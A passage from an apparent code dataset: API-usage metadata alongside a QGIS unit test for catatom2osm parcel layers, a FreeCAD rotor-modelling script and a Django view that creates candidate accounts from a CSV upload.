"mopack.shell.ShellArguments",
"mopack.path.Path",
"mopack.iterutils.iterate",
"unittest.mock.patch",
"mopack.usage.pkg_config.PkgConfigUsage",
"mopack.builders.custom.CustomBuilder",
"os.path.join"
] |
[((8989, 9030), 'os.path.join', 'os.path.join', (['self.pkgdir', '"""build"""', '"""foo"""'], {}), "(self.pkgdir, 'build', 'foo')\n", (9001, 9030), False, 'import os\n'), ((9280, 9357), 'mopack.builders.custom.CustomBuilder', 'CustomBuilder', (['"""foo"""'], {'build_commands': "['make']", 'submodules': 'None', '_options': 'opts'}), "('foo', build_commands=['make'], submodules=None, _options=opts)\n", (9293, 9357), False, 'from mopack.builders.custom import CustomBuilder\n'), ((925, 973), 'os.path.join', 'os.path.join', (['self.pkgdir', '"""build"""', 'builder.name'], {}), "(self.pkgdir, 'build', builder.name)\n", (937, 973), False, 'import os\n'), ((1168, 1210), 'unittest.mock.patch', 'mock.patch', (['"""mopack.builders.custom.pushd"""'], {}), "('mopack.builders.custom.pushd')\n", (1178, 1210), False, 'from unittest import mock\n'), ((1227, 1255), 'unittest.mock.patch', 'mock.patch', (['"""subprocess.run"""'], {}), "('subprocess.run')\n", (1237, 1255), False, 'from unittest import mock\n'), ((3644, 3731), 'mopack.usage.pkg_config.PkgConfigUsage', 'PkgConfigUsage', (['"""foo"""'], {'submodules': 'None', '_options': 'opts', '_path_bases': 'self.path_bases'}), "('foo', submodules=None, _options=opts, _path_bases=self.\n path_bases)\n", (3658, 3731), False, 'from mopack.usage.pkg_config import PkgConfigUsage\n'), ((4678, 4720), 'unittest.mock.patch', 'mock.patch', (['"""mopack.builders.custom.pushd"""'], {}), "('mopack.builders.custom.pushd')\n", (4688, 4720), False, 'from unittest import mock\n'), ((4737, 4765), 'unittest.mock.patch', 'mock.patch', (['"""subprocess.run"""'], {}), "('subprocess.run')\n", (4747, 4765), False, 'from unittest import mock\n'), ((5729, 5816), 'mopack.usage.pkg_config.PkgConfigUsage', 'PkgConfigUsage', (['"""foo"""'], {'submodules': 'None', '_options': 'opts', '_path_bases': 'self.path_bases'}), "('foo', submodules=None, _options=opts, _path_bases=self.\n path_bases)\n", (5743, 5816), False, 'from mopack.usage.pkg_config import PkgConfigUsage\n'), ((5849, 5871), 'unittest.mock.patch', 'mock.patch', (['"""os.chdir"""'], {}), "('os.chdir')\n", (5859, 5871), False, 'from unittest import mock\n'), ((5903, 5944), 'os.path.join', 'os.path.join', (['self.pkgdir', '"""build"""', '"""foo"""'], {}), "(self.pkgdir, 'build', 'foo')\n", (5915, 5944), False, 'import os\n'), ((6350, 6392), 'unittest.mock.patch', 'mock.patch', (['"""mopack.builders.custom.pushd"""'], {}), "('mopack.builders.custom.pushd')\n", (6360, 6392), False, 'from unittest import mock\n'), ((9045, 9072), 'unittest.mock.patch', 'mock.patch', (['"""shutil.rmtree"""'], {}), "('shutil.rmtree')\n", (9055, 9072), False, 'from unittest import mock\n'), ((9585, 9623), 'mopack.builders.Builder.rehydrate', 'Builder.rehydrate', (['data'], {'_options': 'opts'}), '(data, _options=opts)\n', (9602, 9623), False, 'from mopack.builders import Builder\n'), ((9889, 9967), 'unittest.mock.patch.object', 'mock.patch.object', (['CustomBuilder', '"""upgrade"""'], {'side_effect': 'CustomBuilder.upgrade'}), "(CustomBuilder, 'upgrade', side_effect=CustomBuilder.upgrade)\n", (9906, 9967), False, 'from unittest import mock\n'), ((10023, 10061), 'mopack.builders.Builder.rehydrate', 'Builder.rehydrate', (['data'], {'_options': 'opts'}), '(data, _options=opts)\n', (10040, 10061), False, 'from mopack.builders import Builder\n'), ((1363, 1407), 'os.path.join', 'os.path.join', (['self.pkgdir', '"""logs"""', '"""foo.log"""'], {}), "(self.pkgdir, 'logs', 'foo.log')\n", (1375, 1407), False, 'import os\n'), ((2076, 2105), 'mopack.shell.ShellArguments', 'ShellArguments', (["['configure']"], {}), "(['configure'])\n", (2090, 2105), False, 'from mopack.shell import ShellArguments\n'), ((2119, 2143), 'mopack.shell.ShellArguments', 'ShellArguments', (["['make']"], {}), "(['make'])\n", (2133, 2143), False, 'from mopack.shell import ShellArguments\n'), ((2702, 2740), 'mopack.shell.ShellArguments', 'ShellArguments', (["['configure', '--foo']"], {}), "(['configure', '--foo'])\n", (2716, 2740), False, 'from mopack.shell import ShellArguments\n'), ((2754, 2785), 'mopack.shell.ShellArguments', 'ShellArguments', (["['make', '-j2']"], {}), "(['make', '-j2'])\n", (2768, 2785), False, 'from mopack.shell import ShellArguments\n'), ((4266, 4290), 'mopack.shell.ShellArguments', 'ShellArguments', (["['make']"], {}), "(['make'])\n", (4280, 4290), False, 'from mopack.shell import ShellArguments\n'), ((4367, 4402), 'mopack.shell.ShellArguments', 'ShellArguments', (["['make', 'install']"], {}), "(['make', 'install'])\n", (4381, 4402), False, 'from mopack.shell import ShellArguments\n'), ((4874, 4928), 'os.path.join', 'os.path.join', (['self.pkgdir', '"""logs"""', '"""deploy"""', '"""foo.log"""'], {}), "(self.pkgdir, 'logs', 'deploy', 'foo.log')\n", (4886, 4928), False, 'import os\n'), ((5652, 5676), 'mopack.shell.ShellArguments', 'ShellArguments', (["['make']"], {}), "(['make'])\n", (5666, 5676), False, 'from mopack.shell import ShellArguments\n'), ((6794, 6818), 'mopack.shell.ShellArguments', 'ShellArguments', (["['make']"], {}), "(['make'])\n", (6808, 6818), False, 'from mopack.shell import ShellArguments\n'), ((674, 693), 'mopack.iterutils.iterate', 'iterate', (['submodules'], {}), '(submodules)\n', (681, 693), False, 'from mopack.iterutils import iterate\n'), ((3515, 3535), 'mopack.path.Path', 'Path', (['""""""', '"""builddir"""'], {}), "('', 'builddir')\n", (3519, 3535), False, 'from mopack.path import Path\n'), ((3880, 3921), 'os.path.join', 'os.path.join', (['self.pkgdir', '"""build"""', '"""foo"""'], {}), "(self.pkgdir, 'build', 'foo')\n", (3892, 3921), False, 'import os\n'), ((5616, 5636), 'mopack.path.Path', 'Path', (['""""""', '"""builddir"""'], {}), "('', 'builddir')\n", (5620, 5636), False, 'from mopack.path import Path\n'), ((3440, 3458), 'mopack.path.Path', 'Path', (['""""""', '"""srcdir"""'], {}), "('', 'srcdir')\n", (3444, 3458), False, 'from mopack.path import Path\n'), ((5549, 5567), 'mopack.path.Path', 'Path', (['""""""', '"""srcdir"""'], {}), "('', 'srcdir')\n", (5553, 5567), False, 'from mopack.path import Path\n')]
|
import logging
import unittest
import mock
from qgis.core import QgsVectorLayer
from catatom2osm.app import QgsSingleton
from catatom2osm.geo.geometry import Geometry
from catatom2osm.geo.layer.cons import ConsLayer
from catatom2osm.geo.layer.parcel import ParcelLayer
qgs = QgsSingleton()
m_log = mock.MagicMock()
m_log.app_level = logging.INFO
class TestParcelLayer(unittest.TestCase):
@mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
@mock.patch("catatom2osm.geo.layer.base.log", m_log)
def setUp(self):
fn = "test/fixtures/parcel.gpkg|layername=parcel"
self.parcel = ParcelLayer("38012")
fixture = QgsVectorLayer(fn, "parcel", "ogr")
self.assertTrue(fixture.isValid(), "Loading fixture")
self.parcel.append(fixture)
self.assertEqual(self.parcel.featureCount(), 186)
fn = "test/fixtures/cons.gpkg|layername=cons"
fixture2 = QgsVectorLayer(fn, "cons", "ogr")
self.building = ConsLayer("MultiPolygon", "cons", "memory")
self.building.append(fixture2)
self.assertTrue(self.building.isValid(), "Loading fixture")
def test_init(self):
layer = ParcelLayer("38012")
self.assertEqual(layer.fields()[0].name(), "localId")
self.assertEqual(layer.fields()[1].name(), "parts")
self.assertEqual(layer.rename["localId"], "inspireId_localId")
def test_not_empty(self):
layer = ParcelLayer("38012")
self.assertGreater(len(layer.fields().toList()), 0)
def test_delete_void_parcels(self):
self.parcel.delete_void_parcels(self.building)
self.assertEqual(self.parcel.featureCount(), 110)
def test_create_missing_parcels(self):
self.parcel.create_missing_parcels(self.building)
self.assertEqual(self.parcel.featureCount(), 188)
p = next(self.parcel.search("localId = '8642317CS5284S'"))
self.assertEqual(len(Geometry.get_multipolygon(p)[0]), 1)
def test_get_groups_by_adjacent_buildings(self):
self.parcel.create_missing_parcels(self.building)
pa_groups, pa_refs, __ = self.parcel.get_groups_by_adjacent_buildings(
self.building
)
self.assertEqual(len(pa_groups), 21)
self.assertEqual(sum([len(gr) for gr in pa_groups]), 85)
@mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
@mock.patch("catatom2osm.geo.layer.base.log", m_log)
@mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
def test_merge_by_adjacent_buildings(self):
self.building.remove_outside_parts()
self.building.explode_multi_parts()
self.building.clean()
self.parcel.delete_void_parcels(self.building)
self.parcel.create_missing_parcels(self.building)
self.parcel.count_parts(self.building)
pca = sum([f["parts"] for f in self.parcel.getFeatures()])
la = self.parcel.featureCount()
tasks = self.parcel.merge_by_adjacent_buildings(self.building)
pcd = sum([f["parts"] for f in self.parcel.getFeatures()])
ld = self.parcel.featureCount()
cl = len([k for k, v in tasks.items() if k != v])
self.assertEqual(ld, la - cl)
self.assertEqual(pca, pcd)
pa_refs = [f["localId"] for f in self.parcel.getFeatures()]
expected = [
"001000300CS52D",
"001000400CS52D",
"8641608CS5284S",
"8641612CS5284S",
"8641613CS5284S",
"8641616CS5284S",
"8641620CS5284S",
"8641621CS5284S",
"8641632CS5284S",
"8641636CS5284S",
"8641638CS5284S",
"8641649CS5284S",
"8641653CS5284S",
"8641658CS5284S",
"8641660CS5284S",
"8642302CS5284S",
"8642310CS5284S",
"8642312CS5284S",
"8642313CS5284S",
"8642314CS5284S",
"8642317CS5284S",
"8642321CS5284S",
"8642325CS5484N",
"8642701CS5284S",
"8742701CS5284S",
"8742707CS5284S",
"8742711CS5284S",
"8742721CS5284S",
"8839301CS5283N",
"8840501CS5284S",
"8841602CS5284S",
"8841603CS5284S",
"8844121CS5284S",
"8940301CS5284S",
"8940302CS5284S",
"8940305CS5284S",
"8940306CS5284S",
"8940307CS5284S",
"8940309CS5284S",
"8941505CS5284S",
"9041703CS5294S",
"9041704CS5294S",
"9041705CS5294S",
"9041716CS5294S",
"9041719CS5294S",
"9042401CS5294S",
"9042402CS5294S",
"9042404CS5294S",
]
self.assertEqual(pa_refs, expected)
f = next(self.parcel.search("localId = '8840501CS5284S'"))
self.assertEqual(f["parts"], 11)
merged = []
for bu in self.building.getFeatures():
if self.building.is_building(bu):
ref = self.building.get_id(bu)
if ref not in pa_refs:
merged.append(ref)
self.assertEqual(len(merged), 71)
self.assertTrue(all([tasks[ref] != ref for ref in merged]))
@mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
@mock.patch("catatom2osm.geo.layer.base.log", m_log)
@mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
def test_count_parts(self):
self.building.remove_outside_parts()
self.building.explode_multi_parts()
self.building.clean()
self.parcel.delete_void_parcels(self.building)
self.parcel.create_missing_parcels(self.building)
parts_count = self.parcel.count_parts(self.building)
self.assertEqual(sum(parts_count.values()), 324)
self.assertEqual(len(parts_count), self.parcel.featureCount())
f = next(self.parcel.search("localId = '8840501CS5284S'"))
self.assertEqual(f["parts"], 7)
self.assertEqual(parts_count["8840501CS5284S"], 7)
f = next(self.parcel.search("localId = '8840502CS5284S'"))
self.assertEqual(f["parts"], 4)
self.assertEqual(parts_count["8840502CS5284S"], 4)
@mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
@mock.patch("catatom2osm.geo.layer.base.log", m_log)
@mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
def test_get_groups_by_parts_count(self):
self.building.remove_outside_parts()
self.building.explode_multi_parts()
self.building.clean()
self.parcel.delete_void_parcels(self.building)
self.parcel.create_missing_parcels(self.building)
self.parcel.count_parts(self.building)
self.parcel.merge_by_adjacent_buildings(self.building)
features = {pa.id(): pa for pa in self.parcel.getFeatures()}
(
pa_groups,
pa_refs,
geometries,
parts_count,
) = self.parcel.get_groups_by_parts_count(10, 100)
self.assertEqual(len(parts_count), 48)
self.assertEqual(len(pa_groups), 18)
self.assertTrue(
all(
[
sum([parts_count[pa_refs[fid]] for fid in group]) <= 10
for group in pa_groups
]
)
)
label_count = set(
[
len(set([self.parcel.get_zone(features[fid]) for fid in group]))
for group in pa_groups
]
)
self.assertEqual(label_count, {1})
@mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
@mock.patch("catatom2osm.geo.layer.base.log", m_log)
@mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
def test_merge_by_parts_count(self):
self.building.remove_outside_parts()
self.building.explode_multi_parts()
self.building.clean()
self.parcel.delete_void_parcels(self.building)
self.parcel.create_missing_parcels(self.building)
self.parcel.merge_by_adjacent_buildings(self.building)
pca = sum([f["parts"] for f in self.parcel.getFeatures()])
la = self.parcel.featureCount()
tasks = self.parcel.merge_by_parts_count(20, 30)
pcd = sum([f["parts"] for f in self.parcel.getFeatures()])
ld = self.parcel.featureCount()
cl = len([k for k, v in tasks.items() if k != v])
self.assertEqual(ld, la - cl)
self.assertEqual(pca, pcd)
|
[
"qgis.core.QgsVectorLayer",
"catatom2osm.app.QgsSingleton",
"mock.patch",
"catatom2osm.geo.layer.parcel.ParcelLayer",
"catatom2osm.geo.layer.cons.ConsLayer",
"mock.MagicMock",
"catatom2osm.geo.geometry.Geometry.get_multipolygon"
] |
[((278, 292), 'catatom2osm.app.QgsSingleton', 'QgsSingleton', ([], {}), '()\n', (290, 292), False, 'from catatom2osm.app import QgsSingleton\n'), ((301, 317), 'mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (315, 317), False, 'import mock\n'), ((467, 518), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.base.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.base.log', m_log)\n", (477, 518), False, 'import mock\n'), ((2376, 2427), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.base.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.base.log', m_log)\n", (2386, 2427), False, 'import mock\n'), ((2433, 2487), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.polygon.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.polygon.log', m_log)\n", (2443, 2487), False, 'import mock\n'), ((5345, 5396), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.base.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.base.log', m_log)\n", (5355, 5396), False, 'import mock\n'), ((5402, 5456), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.polygon.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.polygon.log', m_log)\n", (5412, 5456), False, 'import mock\n'), ((6317, 6368), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.base.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.base.log', m_log)\n", (6327, 6368), False, 'import mock\n'), ((6374, 6428), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.polygon.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.polygon.log', m_log)\n", (6384, 6428), False, 'import mock\n'), ((7664, 7715), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.base.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.base.log', m_log)\n", (7674, 7715), False, 'import mock\n'), ((7721, 7775), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.polygon.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.polygon.log', m_log)\n", (7731, 7775), False, 'import mock\n'), ((620, 640), 'catatom2osm.geo.layer.parcel.ParcelLayer', 'ParcelLayer', (['"""38012"""'], {}), "('38012')\n", (631, 640), False, 'from catatom2osm.geo.layer.parcel import ParcelLayer\n'), ((659, 694), 'qgis.core.QgsVectorLayer', 'QgsVectorLayer', (['fn', '"""parcel"""', '"""ogr"""'], {}), "(fn, 'parcel', 'ogr')\n", (673, 694), False, 'from qgis.core import QgsVectorLayer\n'), ((924, 957), 'qgis.core.QgsVectorLayer', 'QgsVectorLayer', (['fn', '"""cons"""', '"""ogr"""'], {}), "(fn, 'cons', 'ogr')\n", (938, 957), False, 'from qgis.core import QgsVectorLayer\n'), ((982, 1025), 'catatom2osm.geo.layer.cons.ConsLayer', 'ConsLayer', (['"""MultiPolygon"""', '"""cons"""', '"""memory"""'], {}), "('MultiPolygon', 'cons', 'memory')\n", (991, 1025), False, 'from catatom2osm.geo.layer.cons import ConsLayer\n'), ((444, 460), 'mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (458, 460), False, 'import mock\n'), ((1175, 1195), 'catatom2osm.geo.layer.parcel.ParcelLayer', 'ParcelLayer', (['"""38012"""'], {}), "('38012')\n", (1186, 1195), False, 'from catatom2osm.geo.layer.parcel import ParcelLayer\n'), ((1436, 1456), 'catatom2osm.geo.layer.parcel.ParcelLayer', 'ParcelLayer', (['"""38012"""'], {}), "('38012')\n", (1447, 1456), False, 'from catatom2osm.geo.layer.parcel import ParcelLayer\n'), ((2353, 2369), 'mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (2367, 2369), False, 'import mock\n'), ((5322, 5338), 'mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (5336, 5338), False, 'import mock\n'), ((6294, 6310), 'mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (6308, 6310), False, 'import mock\n'), ((7641, 7657), 'mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (7655, 7657), False, 'import mock\n'), ((1927, 1955), 'catatom2osm.geo.geometry.Geometry.get_multipolygon', 'Geometry.get_multipolygon', (['p'], {}), '(p)\n', (1952, 1955), False, 'from catatom2osm.geo.geometry import Geometry\n')]
|
import FreeCAD, Part, Drawing, math, Mesh, importDXF
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_rotor"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * (-0.5)
maximal_diameter = 100
# part_rotor
part_rotor = Part.makeCylinder(maximal_diameter/2 - 5 - 5 - 5, 1)
# part_rotor cut by cylinder_1
cylinder_1 = Part.makeCylinder(2.5, 1)
part_rotor = part_rotor.cut(cylinder_1)
# holes for fixing the rotors
degre = 180
for i in range(int(360/degre)):
radius = 2.5 + 10 + 2.5
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(2.5, 1)
hole.translate(hole_vector)
part_rotor = part_rotor.cut(hole)
# holes for fixing the wires
degre = 30
for i in range(int(360/degre)):
radius = maximal_diameter/2 - 5 - 5 - 5
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(6.5, 1)
hole.translate(hole_vector)
part_rotor = part_rotor.cut(hole)
Part.show(part_rotor)
DOC.recompute()
__objs__ = []
__objs__.append(FreeCAD.getDocument("part_rotor").getObject("Shape"))
stl_file = u"part_rotor.stl"
Mesh.export(__objs__, stl_file)
dxf_file = u"part_rotor.dxf"
importDXF.export(__objs__, dxf_file)
setview()
|
[
"Mesh.export",
"FreeCAD.getDocument",
"FreeCAD.newDocument",
"importDXF.export",
"math.sin",
"FreeCAD.Gui.SendMsgToActiveView",
"FreeCAD.setActiveDocument",
"math.cos",
"FreeCAD.Gui.activeDocument",
"FreeCAD.activeDocument",
"Part.show",
"Part.makeCylinder"
] |
[((60, 84), 'FreeCAD.activeDocument', 'FreeCAD.activeDocument', ([], {}), '()\n', (82, 84), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((670, 724), 'Part.makeCylinder', 'Part.makeCylinder', (['(maximal_diameter / 2 - 5 - 5 - 5)', '(1)'], {}), '(maximal_diameter / 2 - 5 - 5 - 5, 1)\n', (687, 724), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((768, 793), 'Part.makeCylinder', 'Part.makeCylinder', (['(2.5)', '(1)'], {}), '(2.5, 1)\n', (785, 793), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1501, 1522), 'Part.show', 'Part.show', (['part_rotor'], {}), '(part_rotor)\n', (1510, 1522), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1657, 1688), 'Mesh.export', 'Mesh.export', (['__objs__', 'stl_file'], {}), '(__objs__, stl_file)\n', (1668, 1688), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1720, 1756), 'importDXF.export', 'importDXF.export', (['__objs__', 'dxf_file'], {}), '(__objs__, dxf_file)\n', (1736, 1756), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((291, 333), 'FreeCAD.Gui.SendMsgToActiveView', 'FreeCAD.Gui.SendMsgToActiveView', (['"""ViewFit"""'], {}), "('ViewFit')\n", (322, 333), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((418, 447), 'FreeCAD.newDocument', 'FreeCAD.newDocument', (['DOC_NAME'], {}), '(DOC_NAME)\n', (437, 447), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((452, 487), 'FreeCAD.setActiveDocument', 'FreeCAD.setActiveDocument', (['DOC_NAME'], {}), '(DOC_NAME)\n', (477, 487), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((498, 522), 'FreeCAD.activeDocument', 'FreeCAD.activeDocument', ([], {}), '()\n', (520, 522), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1064, 1089), 'Part.makeCylinder', 'Part.makeCylinder', (['(2.5)', '(1)'], {}), '(2.5, 1)\n', (1081, 1089), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1404, 1429), 'Part.makeCylinder', 'Part.makeCylinder', (['(6.5)', '(1)'], {}), '(6.5, 1)\n', (1421, 1429), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1009, 1024), 'math.cos', 'math.cos', (['alpha'], {}), '(alpha)\n', (1017, 1024), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1033, 1048), 'math.sin', 'math.sin', (['alpha'], {}), '(alpha)\n', (1041, 1048), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1349, 1364), 'math.cos', 'math.cos', (['alpha'], {}), '(alpha)\n', (1357, 1364), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1373, 1388), 'math.sin', 'math.sin', (['alpha'], {}), '(alpha)\n', (1381, 1388), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1572, 1605), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""part_rotor"""'], {}), "('part_rotor')\n", (1591, 1605), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((338, 366), 'FreeCAD.Gui.activeDocument', 'FreeCAD.Gui.activeDocument', ([], {}), '()\n', (364, 366), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n')]
|
import csv
from collections import OrderedDict
import threading
import time
from typing import Tuple
from django.http import Http404, JsonResponse
from django.shortcuts import render
from django.conf import settings
from django.contrib.auth.models import BaseUserManager, Group, User
from django.core.mail import EmailMultiAlternatives
from django.template.loader import render_to_string
from hknweb.thread.models import ThreadTask
from hknweb.utils import login_and_permission, get_rand_photo
from hknweb.models import Profile
from hknweb.views.users import get_current_cand_semester
from hknweb.candidate.constants import (
ATTR,
CandidateDTO,
DEFAULT_RANDOM_PASSWORD_LENGTH,
)
@login_and_permission("auth.add_user")
def create_candidates_view(request):
"""
View for creating multiple candidates given a CSV of their information
See "add_cands" for more details
"""
return render(request, "candidate/create_candidates.html")
@login_and_permission("auth.add_user")
def add_cands(request):
if request.method != ATTR.POST:
raise Http404()
cand_csv_file = request.FILES.get(ATTR.CAND_CSV, None)
if cand_csv_file is None:
return JsonResponse(
{
"success": False,
"id": -1,
"message": "No file detected (can be internal error)",
}
)
if not cand_csv_file.name.endswith(ATTR.CSV_ENDING):
return JsonResponse(
{"success": False, "id": -1, "message": "Please input a csv file!"}
)
decoded_cand_csv_file = cand_csv_file.read().decode(ATTR.UTF8SIG).splitlines()
cand_csv = csv.DictReader(decoded_cand_csv_file)
num_rows = sum(1 for _ in csv.DictReader(decoded_cand_csv_file))
website_login_link = request.build_absolute_uri("/accounts/login/")
task_id = spawn_threaded_add_cands_and_email(cand_csv, website_login_link, num_rows)
return JsonResponse({"success": True, "id": task_id, "message": ""})
@login_and_permission("auth.add_user")
def check_mass_candidate_status(request, id):
task = ThreadTask.objects.get(pk=id)
return JsonResponse(
{
"progress": task.progress,
"message": task.message,
"is_successful": task.is_successful,
"is_done": task.is_done,
}
)
NO_ACTION_PLS_FIX = "No candidate account actions have been taken, so re-upload the entire file after fixing the errors."
def spawn_threaded_add_cands_and_email(cand_csv, website_login_link, num_rows):
"""
Spawn a single background thread to provision candidate
"""
task = ThreadTask()
task.save()
t = threading.Thread(
target=threaded_add_cands_and_email,
args=[cand_csv, num_rows, website_login_link, task],
)
task.startThread(t)
return task.id
def threaded_add_cands_and_email(cand_csv, num_rows, website_login_link, task):
try:
result, msg = add_cands_and_email(cand_csv, num_rows, website_login_link, task)
except Exception as e:
result = False
msg = str(e)
task.message = msg
if result:
task.complete()
else:
task.failure()
task.progress = 100
task.save()
def check_duplicates(
candidatedto: CandidateDTO,
row: OrderedDict,
email_set: set,
username_set: set,
i: int,
) -> Tuple[bool, str]:
error_msg = ""
# Check for duplicate Email
cand_email_in_set = candidatedto.email in email_set
if cand_email_in_set or User.objects.filter(email=candidatedto.email).count() > 0:
if cand_email_in_set:
error_msg = "Duplicate email {} in the Candidate data.".format(
candidatedto.email
)
else:
error_msg = "Account with email {} already exists.".format(
candidatedto.email
)
error_msg += " "
error_msg += "No candidate account actions have been taken, so re-upload the entire file after fixing the errors."
error_msg += " "
error_msg += "Error Row Information at row {}: {}.".format(i + 1, row)
return True, error_msg
# Check for duplicate Username
cand_username_in_set = candidatedto.username in username_set
if (
cand_username_in_set
or User.objects.filter(username=candidatedto.username).count() > 0
):
if cand_username_in_set:
error_msg = "Duplicate username {} in the Candidate data.".format(
candidatedto.username
)
else:
error_msg = "Account of username {} already exists.".format(
candidatedto.username
)
error_msg += " "
error_msg += "No candidate account actions have been taken, so re-upload the entire file after fixing the errors."
error_msg += " "
error_msg += "Error Row Information at row {}: {}.".format(i + 1, row)
return True, error_msg
return False, ""
def add_cands_and_email(cand_csv, num_rows, website_login_link, task=None):
candidate_group = Group.objects.get(name=ATTR.CANDIDATE)
progress_float = 0.0
CAND_ACC_WEIGHT = 0.75
EMAIL_WEIGHT = 0.25
# Sanity check progress
if task is not None:
task.progress = 1.0
task.save()
# Pre-screen and validate data
new_cand_list = []
email_set = set()
username_set = set()
current_cand_semester = get_current_cand_semester()
email_passwords = {}
if current_cand_semester is None:
error_msg = "Inform CompServ the following: Please add the current semester in CourseSemester."
error_msg += " "
error_msg += NO_ACTION_PLS_FIX
return False, error_msg
for i, row in enumerate(cand_csv):
try:
candidatedto = CandidateDTO(row)
except AssertionError as e:
error_msg = "Invalid CSV format. Check that your columns are correctly labeled, there are NO blank rows, and filled out for each row."
error_msg += " "
error_msg += NO_ACTION_PLS_FIX
error_msg += " "
error_msg += "Candidate error message: {}.".format(e)
error_msg += " "
error_msg += "Row Information at row {}: {}.".format(i + 1, row)
return False, error_msg
password = BaseUserManager.make_random_password(
None, length=DEFAULT_RANDOM_PASSWORD_LENGTH
)
duplicate, error_msg = check_duplicates(
candidatedto, row, email_set, username_set, i
)
if duplicate:
return False, error_msg
new_cand = User(
username=candidatedto.username,
email=candidatedto.email,
)
email_set.add(candidatedto.email)
username_set.add(candidatedto.username)
new_cand.first_name = candidatedto.first_name
new_cand.last_name = candidatedto.last_name
new_cand.set_password(password)
new_cand_list.append(new_cand)
email_passwords[new_cand.email] = password
progress_float = CAND_ACC_WEIGHT * 100 * (i + 1) / num_rows
if task is not None:
task.progress = round(progress_float)
task.save()
# Reset to CAND_ACC_WEIGHT in case floating point errors
progress_float = CAND_ACC_WEIGHT * 100
if task is not None:
task.progress = round(progress_float)
task.save()
num_of_accounts = len(email_set)
if num_of_accounts != num_rows:
error_msg = (
"Internal Error: number of accounts ({}) != number of rows ({})".format(
num_of_accounts, num_rows
)
)
error_msg += " "
error_msg += NO_ACTION_PLS_FIX
return False, error_msg
# Release the memory once done
del email_set
del username_set
email_errors = []
for i, new_cand in enumerate(new_cand_list):
if i != 0 and i % 50 == 0:
time.sleep(10)
new_cand.save()
candidate_group.user_set.add(new_cand)
profile = Profile.objects.get(user=new_cand)
profile.candidate_semester = current_cand_semester
profile.save()
subject = "[HKN] Candidate account"
html_content = render_to_string(
"candidate/new_candidate_account_email.html",
{
"subject": subject,
"first_name": new_cand.first_name,
"username": new_cand.username,
"password": email_passwords[new_cand.email],
"website_link": website_login_link,
"img_link": get_rand_photo(),
},
)
if settings.DEBUG:
print("\n")
print(new_cand.first_name, new_cand.username, new_cand.email)
print(html_content)
print("\n")
else:
msg = EmailMultiAlternatives(
subject, subject, settings.NO_REPLY_EMAIL, [new_cand.email]
)
msg.attach_alternative(html_content, "text/html")
try:
msg.send()
except Exception as e:
email_errors.append((new_cand_list[i].email, str(e)))
progress_float = (CAND_ACC_WEIGHT * 100) + (
EMAIL_WEIGHT * 100 * (i + 1) / num_of_accounts
)
